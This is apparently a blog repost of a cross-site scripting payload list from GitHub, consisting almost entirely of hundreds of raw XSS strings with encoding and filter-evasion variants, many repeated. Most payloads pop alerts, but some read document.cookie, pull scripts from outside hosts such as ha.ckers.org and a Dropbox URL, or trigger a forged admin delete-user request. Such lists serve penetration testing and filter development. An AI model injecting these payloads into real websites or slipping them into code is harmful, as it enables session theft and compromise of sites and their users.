Nick's IT Things - XSS Payload List

XSS Payload List from -------> Github

"-prompt(8)-"

'-prompt(8)-'

";a=prompt,a()//

';a=prompt,a()//

'-eval("window['pro'%2B'mpt'](8)")-'

"-eval("window['pro'%2B'mpt'](8)")-"

"onclick=prompt(8)>"@x.y

"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y

</scrip</script>t><img src =q onerror=prompt(8)>

'`"><\x3Cscript>javascript:alert(1)</script>

'`"><\x00script>javascript:alert(1)</script>

\x3Cscript>javascript:alert(1)</script>

'"`><script>/* *\x2Fjavascript:alert(1)// */</script>

--> <img src=xxx:x onerror=javascript:alert(1)> -->

-->

-->

-->

`"'><img src='#\x27 onerror=javascript:alert(1)>

"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p>

"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF

"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF

%253Cscript%253Ealert('XSS')%253C%252Fscript%253E

'`"><\x3Cscript>javascript:alert(1)</script>

'`"><\x00script>javascript:alert(1)</script>

"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>

"'`><\x00img src=xxx:x onerror=javascript:alert(1)>

ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF

ABC<div style="x:expression\x5C(javascript:alert(1)">DEF

ABC<div style="x:expression\x00(javascript:alert(1)">DEF

ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF

ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF

ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF

ABC<div style="x:\x09expression(javascript:alert(1)">DEF

ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF

ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF

ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF

ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF

ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF

ABC<div style="x:\x20expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF

ABC<div style="x:\x00expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF

ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF

`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>

`"'><img src=xxx:x \x22onerror=javascript:alert(1)>

`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>

`"'><img src=xxx:x \x0Donerror=javascript:alert(1)>

`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>

`"'><img src=xxx:x \x09onerror=javascript:alert(1)>

`"'><img src=xxx:x \x0Conerror=javascript:alert(1)>

`"'><img src=xxx:x \x00onerror=javascript:alert(1)>

`"'><img src=xxx:x \x27onerror=javascript:alert(1)>

`"'><img src=xxx:x \x20onerror=javascript:alert(1)>

"`'><script>\x3Bjavascript:alert(1)</script>

"`'><script>\x0Djavascript:alert(1)</script>

"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>

"`'><script>\xE2\x80\x81javascript:alert(1)</script>

"`'><script>\xE2\x80\x84javascript:alert(1)</script>

"`'><script>\xE3\x80\x80javascript:alert(1)</script>

"`'><script>\x09javascript:alert(1)</script>

"`'><script>\xE2\x80\x89javascript:alert(1)</script>

"`'><script>\xE2\x80\x85javascript:alert(1)</script>

"`'><script>\xE2\x80\x88javascript:alert(1)</script>

"`'><script>\x00javascript:alert(1)</script>

"`'><script>\xE2\x80\xA8javascript:alert(1)</script>

"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>

"`'><script>\xE1\x9A\x80javascript:alert(1)</script>

"`'><script>\x0Cjavascript:alert(1)</script>

"`'><script>\x2Bjavascript:alert(1)</script>

"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>

"`'><script>-javascript:alert(1)</script>

"`'><script>\x0Ajavascript:alert(1)</script>

"`'><script>\xE2\x80\xAFjavascript:alert(1)</script>

"`'><script>\x7Ejavascript:alert(1)</script>

"`'><script>\xE2\x80\x87javascript:alert(1)</script>

"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>

"`'><script>\xE2\x80\xA9javascript:alert(1)</script>

"`'><script>\xC2\x85javascript:alert(1)</script>

"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>

"`'><script>\xE2\x80\x83javascript:alert(1)</script>

"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>

"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>

"`'><script>\xE2\x80\x80javascript:alert(1)</script>

"`'><script>\x21javascript:alert(1)</script>

"`'><script>\xE2\x80\x82javascript:alert(1)</script>

"`'><script>\xE2\x80\x86javascript:alert(1)</script>

"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>

"`'><script>\x0Bjavascript:alert(1)</script>

"`'><script>\x20javascript:alert(1)</script>

"`'><script>\xC2\xA0javascript:alert(1)</script>

"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />

"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />

"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />

"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />

"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />

"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />

"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />

"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />

"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />

`"'><img src=xxx:x onerror\x0B=javascript:alert(1)>

`"'><img src=xxx:x onerror\x00=javascript:alert(1)>

`"'><img src=xxx:x onerror\x0C=javascript:alert(1)>

`"'><img src=xxx:x onerror\x0D=javascript:alert(1)>

`"'><img src=xxx:x onerror\x20=javascript:alert(1)>

`"'><img src=xxx:x onerror\x0A=javascript:alert(1)>

`"'><img src=xxx:x onerror\x09=javascript:alert(1)>

<video poster=javascript:javascript:alert(1)//

<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X

<form><button formaction="javascript:javascript:alert(1)">X

<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>

<img src=x onerror=javascript:alert(1)//">

<![><img src="]><img src=x onerror=javascript:alert(1)//">

<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>

<b <script>alert(1)</script>0

<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>

<? foo="><script>javascript:alert(1)</script>">

<! foo="><script>javascript:alert(1)</script>">

</ foo="><script>javascript:alert(1)</script>">

<? foo="><x foo='?><script>javascript:alert(1)</script>'>">

<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">

<% foo><x foo="%><script>javascript:alert(1)</script>">

<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>

<img\x47src=x onerror="javascript:alert(1)">

<img\x10src=x onerror="javascript:alert(1)">

<img\x13src=x onerror="javascript:alert(1)">

<img\x32src=x onerror="javascript:alert(1)">

<img\x47src=x onerror="javascript:alert(1)">

<img\x11src=x onerror="javascript:alert(1)">

<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">

<img src="x` `<script>javascript:alert(1)</script>"` `>

<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X

<div style="font-family:'foo
;color:red;';">XXX

<div style="font-family:foo}color=red;">XXX

<// style=x:expression\28javascript:alert(1)\29>

<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X

<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>

<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X

<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X

<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>

X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >

1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`>

1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>>

1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>

<event-source src="%(event)s" onload="javascript:alert(1)">

<<SCRIPT>%(payload)s//<</SCRIPT>

<IMG SRC="javascript:javascript:alert(1)"

<STYLE>@import'%(css)s';</STYLE>

<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">

<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS

<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>

<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>

<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javascript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML>

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-

<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X

<STYLE>@import'%(css)s';</STYLE>

<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>

<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";

alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--

></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

'';!--"<XSS>=&{()}

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

<<SCRIPT>alert("XSS");//<</SCRIPT>

<IMG SRC="javascript:alert('XSS')"

\";alert('XSS');//

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

¼script¾alert(¢XSS¢)¼/script¾

<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>

Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<input/onmouseover="javaSCRIPT&colon;confirm(1)"

<sVg><scRipt %00>alert(1) {Opera}

<img/src=`%00` onerror=this.onerror=confirm(1)

<form><isindex formaction="javascript&colon;confirm(1)"

<img src=`%00`&NewLine; onerror=alert(1)&NewLine;

<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

"><h1/onmouseover='\u0061lert(1)'>%00

<form><a href="javascript:\u0061lert(1)">X

</script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/onerror='eval(src)'>

<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	
>X</a

http://www.google<script .com>alert(document.location)</script

<a href=[]" onmouseover=prompt(1)//">XYZ</a

<img/src=@  onerror = prompt('1')

</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(

</form><input type="date" onfocus="alert(1)">

<///style///><span %2F onmousemove='alert(1)'>SPAN

<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)

"><svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'

<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}

<marquee onstart='javascript:alert(1)'>^__^

<div/style="width:expression(confirm(1))">X</div> {IE7}

//<form/action=javascript:alert(document&period;cookie)><input/type='submit'>//

/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>

//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\

</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>

</plaintext\></|\><plaintext/onmouseover=prompt(1)

</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}

<var onmouseover="prompt(1)">On Mouse Over</var>

<a href=javascript&colon;alert(document&period;cookie)>Click Here</a>

<%

<input value=<><iframe/src=javascript:confirm(1)

http://www.<script>alert(1)</script .com

<math><a xlink:href="//jsfiddle.net/t846h/">click

<a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a

<body/onload=<!-->&#10alert(1)>

<img src ?itworksonchrome?\/onerror = alert(1)

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

<div/onmouseover='alert(1)'> style="x:">

<--`<img/src=` onerror=alert(1)> --!>

"><img src=x onerror=window.open('https://www.google.com/');>

<form><button formaction=javascript&colon;alert(1)>CLICKME

<math><a xlink:href="//jsfiddle.net/t846h/">click

<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

‘; alert(1);

‘)alert(1);//

<ScRiPt>alert(1)</sCriPt>

<input/onmouseover="javaSCRIPT&colon;confirm(1)"

<sVg><scRipt %00>alert(1) {Opera}

<img/src=`%00` onerror=this.onerror=confirm(1)

<form><isindex formaction="javascript&colon;confirm(1)"

<img src=`%00`&NewLine; onerror=alert(1)&NewLine;

<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

"><h1/onmouseover='\u0061lert(1)'>%00

<form><a href="javascript:\u0061lert(1)">X

</script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/onerror='eval(src)'>

<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	
>X</a

http://www.google<script .com>alert(document.location)</script

<a href=[]" onmouseover=prompt(1)//">XYZ</a

<img/src=@  onerror = prompt('1')

</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(

</form><input type="date" onfocus="alert(1)">

<///style///><span %2F onmousemove='alert(1)'>SPAN

<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)

"><svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'

<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}

<marquee onstart='javascript:alert(1)'>^__^

<div/style="width:expression(confirm(1))">X</div> {IE7}

//<form/action=javascript:alert(document&period;cookie)><input/type='submit'>//

/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>

//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\

</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>

</plaintext\></|\><plaintext/onmouseover=prompt(1)

</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}

<var onmouseover="prompt(1)">On Mouse Over</var>

<a href=javascript&colon;alert(document&period;cookie)>Click Here</a>

<%

<input value=<><iframe/src=javascript:confirm(1)

http://www.<script>alert(1)</script .com

<math><a xlink:href="//jsfiddle.net/t846h/">click

<a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a

<body/onload=<!-->&#10alert(1)>

<img src ?itworksonchrome?\/onerror = alert(1)

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

<div/onmouseover='alert(1)'> style="x:">

<--`<img/src=` onerror=alert(1)> --!>

"><img src=x onerror=window.open('https://www.google.com/');>

<form><button formaction=javascript&colon;alert(1)>CLICKME

<math><a xlink:href="//jsfiddle.net/t846h/">click

<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>

‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>

<<SCRIPT>alert(“XSS”);//<</SCRIPT>

%253cscript%253ealert(1)%253c/script%253e

“><s”%2b”cript>alert(document.cookie)</script>

foo<script>alert(1)</script>

<scr<script>ipt>alert(1)</scr</script>ipt>

<IMG SRC=”javascript:alert(‘XSS’)”

javascript:alert("hellox worldss")

<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<<SCRIPT>alert("XSS");//<</SCRIPT>

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search

0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search

<h1><font color=blue>hellox worldss</h1>

<form><button formaction="javascript:alert(XSS)">lol

<img src=x onerror=alert(XSS)//">

<![><img src="]><img src=x onerror=alert(XSS)//">

<? foo="><script>alert(1)</script>">

<! foo="><script>alert(1)</script>">

</ foo="><script>alert(1)</script>">

<? foo="><x foo='?><script>alert(1)</script>'>">

<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">

<% foo><x foo="%><script>alert(123)</script>">

<div style="font-family:'foo
;color:red;';">LOL

LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>

<SCRIPT>alert(/XSS/.source)</SCRIPT>

\\";alert('XSS');//

</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">

<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>

<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS

žscriptualert(EXSSE)ž/scriptu

<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"

<STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>

exp/*<A STYLE='no\xss:noxss(\"*//*\");

xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>

<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>

<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>

<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>

<!--[if gte IE 4]>

<SCRIPT>alert('XSS');</SCRIPT>

<![endif]-->

a=\"get\";

b=\"URL(\\"\";

c=\"javascript:\";

d=\"alert('XSS');\\")\";

eval(a+b+c+d);

</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID=\"xss\"><I><B><IMG SRC=\"javascript:alert('XSS')\"></B></I></XML>

<?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">

<?import namespace=\"t\" implementation=\"#default#time2\">

<t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\">

</BODY></HTML>

<? echo('<SCR)';

echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>

Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">

<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

%3C

&lt

&LT

&LT;

&#60

&#060

&#0060

&#00060

&#000060

&#0000060

&#x3c

&#x03c

&#x003c

&#x0003c

&#x00003c

&#x000003c

&#x000003c;

&#X3c

&#X03c

&#X003c

&#X0003c

&#X00003c

&#X000003c

&#X3c;

&#X03c;

&#X003c;

&#X0003c;

&#X00003c;

&#X000003c;

&#x3C

&#x03C

&#x003C

&#x0003C

&#x00003C

&#x000003C

&#x000003C;

&#X3C

&#X03C

&#X003C

&#X0003C

&#X00003C

&#X000003C

&#X3C;

&#X03C;

&#X003C;

&#X0003C;

&#X00003C;

&#X000003C;

\x3c

\x3C

\u003c

\u003C

<IMG SRC=\"javascript:alert('XSS')\"

<<SCRIPT>alert(\"XSS\");//<</SCRIPT>

perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out

perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out

<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">

'';!--\"<XSS>=&{()}

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

'';!--"<XSS>=&{()}

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<<SCRIPT>alert("XSS");//<</SCRIPT>

<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>

\";alert('XSS');//

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

¼script¾alert(¢XSS¢)¼/script¾

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION

<form><button formaction="javascript:alert(123)">crosssitespt

<img src=x onerror=alert(123)//">

<? foo="><script>alert(1)</script>">

<! foo="><script>alert(1)</script>">

</ foo="><script>alert(1)</script>">

+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-

%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-

+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-

%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-

%253cscript%253ealert(document.cookie)%253c/script%253e

“><s”%2b”cript>alert(document.cookie)</script>

“><ScRiPt>alert(document.cookie)</script>

“><<script>alert(document.cookie);//<</script>

foo<script>alert(document.cookie)</script>

<scr<script>ipt>alert(document.cookie)</scr</script>ipt>

%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E

‘; alert(document.cookie); var foo=’

foo\’; alert(document.cookie);//’;

</script><script >alert(document.cookie)</script>

"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

'';!--"<XSS>=&{()}

0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(

'XSS')>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&

#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<IMG SRC="javascript:alert('XSS')"

\";alert('XSS');//

</script><script>alert('XSS');</script>

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

exp/*<A STYLE='no\xss:noxss("*//*");

xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

